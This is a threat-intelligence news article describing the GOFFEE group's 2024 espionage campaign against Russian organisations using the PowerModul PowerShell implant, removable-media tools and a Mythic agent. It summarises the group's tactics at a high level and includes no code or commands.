Threat actor GOFFEE has ramped up its cyber espionage activities with the introduction of PowerModul, a sophisticated PowerShell implant enabling advanced infiltration and remote command execution.
This campaign, targeting Russian organizations in key sectors such as government, energy, media, and telecommunications, marks a significant evolution in GOFFEE’s tactics and toolset.
Shift in Operational Strategy
Active since early 2022, GOFFEE initially relied on malicious IIS modules like Owowa for attacks.
However, by mid-2023, the group adopted patched instances of legitimate Windows system files like explorer.exe, embedding shellcode within to compromise systems during spear phishing campaigns.
Starting in 2024, GOFFEE shifted to deploying PowerModul, a highly capable PowerShell-based implant that communicates with command-and-control (C2) servers to download additional malware components, execute remote instructions, and exfiltrate sensitive data.
One hallmark of their current modus operandi is leveraging layered infection chains. Initial access is gained via spear phishing emails carrying RAR archives masquerading as legitimate documents.
According to the Report, these archives could either contain patched executables or Word documents embedding malicious VBA macros, which trigger a multifaceted payload delivery mechanism.
PowerModul, now central to GOFFEE’s campaigns, is a lightweight yet versatile PowerShell script designed for dynamic task execution.
Upon deployment, it uses system-specific identifiers such as usernames and disk serial numbers to establish secure communication with its dedicated C2 servers.
The implant supports payload transmission encoded in Base64, employing obfuscation techniques to avoid detection.
In addition to facilitating direct remote operations, PowerModul aids in executing tasks through secondary tools like PowerTaskel, FlashFileGrabber, and USB Worm.
FlashFileGrabber, for example, is designed to extract files from removable media and transmit them to attackers, while USB Worm propagates infections across systems via removable drives.
Increasing Use of Mythic Agent for Lateral Movement
GOFFEE has recently shifted its focus from PowerTaskel a Mythic-based PowerShell agent to using a binary Mythic agent for lateral movement.
This custom agent is injected into memory during privileged operations, allowing the attackers to bypass traditional security measures.
The binary agent communicates with remote systems using protocols such as WinRM, thereby enabling seamless propagation across organizational networks.
In lateral movement phases, malicious payloads are often delivered through protocols like HTTP via the mshta.exe utility, exploiting advanced polyglot files combining HTML Application (HTA) scripts with embedded shellcode.
These payloads execute highly obfuscated code that launches secondary attack scripts, further consolidating GOFFEE’s foothold within compromised environments.
From July to December 2024, GOFFEE specifically targeted entities within Russia, focusing on sectors vital to national infrastructure.
The inclusion of government agencies and energy companies underscores the strategic intent behind these campaigns, signaling a preference for high-value data linked to operations, policies, and industrial processes.
Analysts attribute this campaign to GOFFEE with high confidence due to overlapping toolkits, victim profiles, and spear phishing techniques seen in earlier attacks.
While their new deployment of PowerModul and binary Mythic agents reflects tactical ingenuity, the consistent use of patched executables and layered infection chains ties them to their established identity.
These advancements highlight the evolving threat posed by GOFFEE, as they continuously refine their arsenal to circumvent detection and maximize impact.
Organizations in targeted sectors must bolster their security measures, particularly against phishing and PowerShell-based intrusions, to mitigate the risks from this increasingly adaptive adversary.
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates
